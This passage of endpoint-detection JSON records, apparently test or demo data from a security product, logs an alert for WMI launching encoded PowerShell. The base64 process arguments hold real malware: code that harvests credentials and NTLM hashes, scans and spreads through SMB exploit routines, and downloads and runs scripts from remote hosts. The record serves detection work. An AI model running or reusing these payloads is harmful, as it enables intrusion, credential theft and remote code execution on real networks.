0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQ